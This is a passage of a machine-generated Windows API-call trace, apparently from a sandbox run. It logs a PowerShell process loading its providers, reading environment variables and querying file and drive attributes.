lpStrings=0x29b34d8*="Alias", lpRawData=0x29b3394) returned 1 [0053.242] GetLastError () returned 0x0 [0053.242] GetEnvironmentVariableW (in: 
lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.242] GetLastError () returned 0xcb [0053.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.243] GetLastError () returned 0xcb [0053.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.243] GetLastError () returned 0xcb [0053.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.243] GetLastError () returned 0xcb [0053.243] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.243] GetLastError () returned 0xcb [0053.243] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.244] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29b743c*="Environment", lpRawData=0x29b72f8) returned 1 [0053.244] 
GetLastError () returned 0x0 [0053.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.245] GetLastError () returned 0xcb [0053.245] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0053.245] GetLastError () returned 0xcb [0053.245] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0053.245] GetLastError () returned 0xcb [0053.246] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x14e684, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0053.246] GetLastError () returned 0xcb [0053.246] SetErrorMode (uMode=0x1) returned 0x1 [0053.246] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x14eb04 | out: lpFileInformation=0x14eb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.246] GetLastError () returned 0xcb [0053.246] SetErrorMode (uMode=0x1) returned 0x1 [0053.250] GetLogicalDrives () returned 0x4 [0053.250] GetLastError () returned 0xcb [0053.254] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.254] GetLastError () returned 0xcb [0053.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.255] GetLastError () returned 0xcb [0053.255] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3176c0, 
nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14ead0, lpMaximumComponentLength=0x14eacc, lpFileSystemFlags=0x14eac8, lpFileSystemNameBuffer=0x3175c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ead0*=0x78b95e2e, lpMaximumComponentLength=0x14eacc*=0xff, lpFileSystemFlags=0x14eac8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0053.257] GetLastError () returned 0xcb [0053.257] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e630, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b865c | out: lpFileInformation=0x29b865c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.257] GetLastError () returned 0xcb [0053.257] SetErrorMode (uMode=0x1) returned 0x1 [0053.257] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e630, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.257] GetLastError () returned 0xcb [0053.259] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e578, 
lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e580, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.259] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b92b4 | out: lpFileInformation=0x29b92b4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.259] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e588, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.259] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b9404 | out: lpFileInformation=0x29b9404*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.260] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5cc, lpFilePart=0x0 | out: lpBuffer="C:\\", 
lpFilePart=0x0) returned 0x3 [0053.260] GetLastError () returned 0xcb [0053.260] SetErrorMode (uMode=0x1) returned 0x1 [0053.260] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b95a4 | out: lpFileInformation=0x29b95a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.260] GetLastError () returned 0xcb [0053.260] SetErrorMode (uMode=0x1) returned 0x1 [0053.260] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.260] GetLastError () returned 0xcb [0053.260] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.261] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29bc2fc*="FileSystem", lpRawData=0x29bc1b8) returned 1 [0053.261] GetLastError () returned 0x0 [0053.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.262] GetLastError () returned 0xcb [0053.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.262] GetLastError () returned 0xcb [0053.262] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.262] GetLastError () returned 0xcb [0053.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.262] GetLastError () returned 0xcb [0053.263] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.263] GetLastError () returned 0xcb [0053.263] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.263] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29c03bc*="Function", lpRawData=0x29c0278) returned 1 [0053.263] GetLastError () returned 0x0 [0053.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.266] GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] 
GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] GetLastError () returned 0xcb [0053.292] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.292] GetLastError () returned 0xcb [0053.292] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.293] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29d9440*="Registry", lpRawData=0x29d92fc) returned 1 [0053.293] GetLastError () returned 0x0 [0053.293] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.293] GetLastError () returned 0x0 [0053.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.294] GetLastError () returned 0x0 [0053.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.294] GetLastError () returned 0x0 [0053.294] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.294] GetLastError () returned 0x0 [0053.295] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.295] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29dd1f8*="Variable", lpRawData=0x29dd0b4) returned 1 [0053.295] GetLastError () returned 0x0 [0053.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.296] 
GetLastError () returned 0xcb [0053.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.297] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.337] GetUserNameExW (in: 
NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.337] GetLastError () returned 0x3 [0053.337] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.338] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29eaf8c*="Certificate", lpRawData=0x29eae48) returned 1 [0053.338] GetLastError () returned 0x0 [0053.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.345] GetLastError () returned 0xcb [0053.347] GetLogicalDrives () returned 0x4 [0053.347] GetLastError () returned 0xcb [0053.347] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.347] GetLastError () returned 0xcb [0053.347] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.347] GetLastError () returned 0xcb [0053.348] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3175c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.348] GetLastError () returned 0xcb [0053.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.349] GetLastError () returned 0xcb [0053.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.349] GetLastError () returned 0xcb [0053.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.372] GetLastError () returned 0xcb [0053.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.373] GetLastError () returned 0xcb [0053.373] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.373] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29f1eac | out: lpFileInformation=0x29f1eac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.374] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.374] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29f2040 | out: lpFileInformation=0x29f2040*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.374] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.374] GetLastError () returned 0xcb [0053.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", 
nBufferLength=0x105, lpBuffer=0x14e664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.375] GetLastError () returned 0xcb [0053.375] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.375] GetLastError () returned 0xcb [0053.375] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.376] GetLastError () 
returned 0xcb [0053.376] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e590, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.376] GetLastError () returned 0xcb [0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 